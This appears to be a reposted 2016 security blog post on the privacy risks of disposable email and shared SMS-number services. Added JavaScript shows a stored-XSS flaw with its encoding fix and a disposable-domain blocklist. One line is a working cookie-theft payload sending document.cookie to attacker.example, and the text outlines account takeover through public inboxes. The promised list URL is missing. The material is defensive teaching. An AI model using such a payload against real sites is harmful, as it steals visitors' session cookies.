Monday, 1 February 2016

Temporary and Disposable Email: Anonymity, Privacy or Security?

Several websites offer temporary and disposable email addresses. They have become popular among Internet users because they give anyone who wants to keep their real address private a quick alternative for sending and receiving email.
Some of these addresses exist for only a few minutes; others, once created, remain publicly accessible to anyone indefinitely. The same applies to websites that expose shared mobile numbers for receiving text messages (SMS), with a wide range of numbers available from different countries.

In effect, a user can register with an online service using one of these publicly available mobile numbers and read the verification texts on the website, as can everyone else.

Some may argue that these disposable email and SMS services provide a degree of privacy. That may be true under specific circumstances, but anonymity should not be confused with privacy, and neither should be confused with security.

Entering fake details together with a disposable address lets a user sign up while avoiding any future communication from that website to their real email or phone, but at what cost?

When using these services it is not possible to know who else is reading the outgoing and, especially, the incoming messages. Consequently:
  • Any future communication that contains sensitive data will be publicly visible, or at the very least disclosed to unauthorised third parties.
  • Because it is not known who operates or has access to these services and their servers, the operator, or anyone who compromises them, could intercept attachments and inject malicious code to spread malware. The same goes for SMS messages containing hyperlinks: the links could be rewritten automatically to point to a different address that loads the original page in an iframe.
  • Disposable addresses, especially those that live for only a few minutes, have been used in the past to send sensitive information while avoiding a personal or corporate mailbox, which places that information on an untrusted server.
  • If a legitimate account has a temporary email address and a shared mobile number registered as its contact details, anyone watching those public inboxes can redirect its communications, including recovery messages, to themselves and take the account over.
  • Where a website displays incoming SMS messages exactly as received, without encoding them for HTML, anyone who can send a text to one of the listed numbers can inject JavaScript into the page. In other words, such sites are exposed to stored cross-site scripting (XSS) with any payload that fits in a single 160-character message.
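
To make the last point concrete, here is an added example, written for this page and not taken from the article or from any of the services it describes, of how an SMS-display page becomes a stored-XSS sink and how output encoding removes the problem. It also counts message length the way the GSM-7 alphabet does (extension characters such as braces and brackets cost two septets, and anything outside the alphabet forces UCS-2 with a 70-character limit), so it can tell whether a payload really fits in one 160-character segment. The sender, the sample payload and the attacker host name are constructed.

```javascript
// Added example (not from the original article): how a page that shows received
// SMS messages becomes a stored-XSS sink, and the output encoding that fixes it.
// The sample message, sender and attacker host are constructed.

// HTML-encode a string for insertion into element content or an attribute value.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Vulnerable rendering: the message body is concatenated into the markup as-is,
// so any tag inside the SMS becomes live HTML for every visitor (stored XSS).
function renderSmsUnsafe(sender, body) {
  return '<li><b>' + sender + '</b>: ' + body + '</li>';
}

// Hardened rendering: every attacker-controlled field is encoded first. The
// sender is encoded too, since caller-ID strings are not trustworthy either.
function renderSmsSafe(sender, body) {
  return '<li><b>' + escapeHtml(sender) + '</b>: ' + escapeHtml(body) + '</li>';
}

// True if the rendered HTML still contains an un-neutralised <script> tag.
function containsLiveScript(html) {
  return /<script[\s>]/i.test(html);
}

// GSM 03.38 default alphabet: basic-table characters cost one septet,
// extension-table characters cost two. Anything else forces UCS-2 encoding,
// where a single segment holds 70 UTF-16 code units instead of 160 septets.
const GSM7_BASIC =
  '@£$¥èéùìòÇ\nØø\rÅåΔ_ΦΓΛΩΠΨΣΘΞÆæßÉ !"#¤%&\'()*+,-./0123456789:;<=>?' +
  '¡ABCDEFGHIJKLMNOPQRSTUVWXYZÄÖÑÜ§¿abcdefghijklmnopqrstuvwxyzäöñüà';
const GSM7_EXTENSION = '^{}\\[~]|€';

// Septet count of a message, or null if it cannot be sent as GSM-7 at all.
function gsm7Units(text) {
  let units = 0;
  for (const ch of text) {
    if (GSM7_BASIC.includes(ch)) units += 1;
    else if (GSM7_EXTENSION.includes(ch)) units += 2;
    else return null;
  }
  return units;
}

// Does the payload fit in one SMS segment under whichever encoding applies?
function fitsInOneSms(text) {
  const units = gsm7Units(text);
  return units !== null ? units <= 160 : text.length <= 70;
}

// Constructed payload: sends the viewer's cookies to a hypothetical host.
// No braces, brackets or backslashes, so every character is a single septet.
const SAMPLE_PAYLOAD =
  '<script>new Image().src="//attacker.example/?c="+document.cookie</script>';

console.log('septets:', gsm7Units(SAMPLE_PAYLOAD), 'fits in one SMS:', fitsInOneSms(SAMPLE_PAYLOAD));
console.log('unsafe:', renderSmsUnsafe('+15550000000', SAMPLE_PAYLOAD));
console.log('safe:  ', renderSmsSafe('+15550000000', SAMPLE_PAYLOAD));
```

The payload above is 73 septets, well inside one segment, and the unsafe renderer hands it to every visitor's browser unchanged; the safe renderer turns it into inert text. Encoding at output time is the fix, not filtering on the way in, because the same stored message may later be rendered in a different context (an attribute, a JSON feed) where a different encoding is needed.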
Google has already taken steps towards blacklisting these emails and phone numbers.

When registering a new Google account, the user is asked for a secondary email address and a mobile number, and none of these disposable addresses or shared numbers is accepted.

Surprisingly, while this is true for Google, it is not true for many other email providers. More surprising still is to see companies within the information security community that have not blacklisted these temporary and disposable email domains on, for example, their webinar registration or whitepaper download forms.

Maintaining a list of these temporary and disposable email domains is not an easy task, and the publicly available mobile numbers used for receiving text messages are harder still.
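
A registration-time check against such a list, as an added example for this page (not the author's list or code): it parses a shared list file of domains and numbers, normalises what the user typed so that capitalisation, trailing dots, subdomains and phone-number formatting cannot bypass it, and rejects a sign-up if either contact is disposable. The list entries are constructed placeholders under the reserved .test domain with fictitious numbers; a real deployment would load a maintained list.

```javascript
// Added example (not from the original article): reject disposable e-mail
// domains and shared SMS numbers at registration time. The list below is a
// constructed placeholder; load a maintained, shared list in practice.

const SAMPLE_LIST = `
# constructed sample entries (reserved .test domains, fictitious numbers)
throwaway-mail.test
TempBox.test.          # case and trailing dot are normalised away
+1 555 000 1000        # phone numbers may be formatted any way
00 44 7700 900123      # an international 00 prefix is turned into +
`;

// Reduce a phone number to "+<digits>" (or bare digits if no country code),
// so that spacing, dashes, brackets or a 00 prefix cannot bypass the list.
function normalizePhone(number) {
  const trimmed = number.trim();
  const digits = trimmed.replace(/\D/g, '');
  if (trimmed.startsWith('+')) return '+' + digits;
  if (digits.startsWith('00')) return '+' + digits.slice(2);
  return digits;
}

// Lower-case a domain and drop a trailing dot (the absolute FQDN form).
function normalizeDomain(domain) {
  return domain.trim().toLowerCase().replace(/\.$/, '');
}

// Parse a shared list: one entry per line, '#' starts a comment, blanks ignored.
// Lines made only of digits and phone punctuation are numbers; the rest are domains.
function parseBlocklist(text) {
  const domains = new Set();
  const phones = new Set();
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.replace(/#.*$/, '').trim();
    if (!line) continue;
    if (/^\+?[\d\s().-]+$/.test(line)) phones.add(normalizePhone(line));
    else domains.add(normalizeDomain(line));
  }
  return { domains, phones };
}

// Domain part of an address, or null if it is not a single addr-spec.
function emailDomain(address) {
  const parts = address.trim().split('@');
  if (parts.length !== 2 || !parts[0] || !parts[1]) return null;
  return normalizeDomain(parts[1]);
}

// 'malformed', 'disposable' or 'ok'. A listed domain also covers its
// subdomains, so "mx.tempbox.test" matches an entry for "tempbox.test";
// the bare top-level label is never checked on its own.
function classifyEmail(address, list) {
  const domain = emailDomain(address);
  if (domain === null) return 'malformed';
  const labels = domain.split('.');
  for (let i = 0; i < labels.length - 1; i++) {
    if (list.domains.has(labels.slice(i).join('.'))) return 'disposable';
  }
  return 'ok';
}

// Same verdicts for a phone number; anything under seven digits is not a number.
function classifyPhone(number, list) {
  const normalized = normalizePhone(number);
  if (normalized.replace(/\D/g, '').length < 7) return 'malformed';
  return list.phones.has(normalized) ? 'disposable' : 'ok';
}

// The combined rule the article describes Google applying: both the
// secondary address and the mobile number must be clean.
function registrationAllowed(email, phone, list) {
  return classifyEmail(email, list) === 'ok' && classifyPhone(phone, list) === 'ok';
}

const BLOCKLIST = parseBlocklist(SAMPLE_LIST);
console.log(classifyEmail('Bob@MX.TempBox.Test.', BLOCKLIST));     // disposable
console.log(classifyPhone('+1 (555) 000-1000', BLOCKLIST));        // disposable
console.log(registrationAllowed('carol@corp.example', '+15550009999', BLOCKLIST)); // true
```

Two caveats a practitioner should keep in mind: the check is only as good as the list, which is why the article argues for sharing and maintaining one, and it does not attempt to handle internationalised domain names or display-name syntax in the address field, both of which should be normalised by the mail-address parser before the domain reaches this lookup.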

However, maintaining such a list, contributing to it and sharing it within the information security community will improve existing email filtering mechanisms. The following URL points to a list of the domains currently used for temporary and disposable email addresses:


Putting this list together was not easy, but I really hope you find it useful.
Let me know your thoughts in the comments section below or on Twitter (@drgfragkos).

This article was published by Tripwire and it is posted here for historical purposes. 
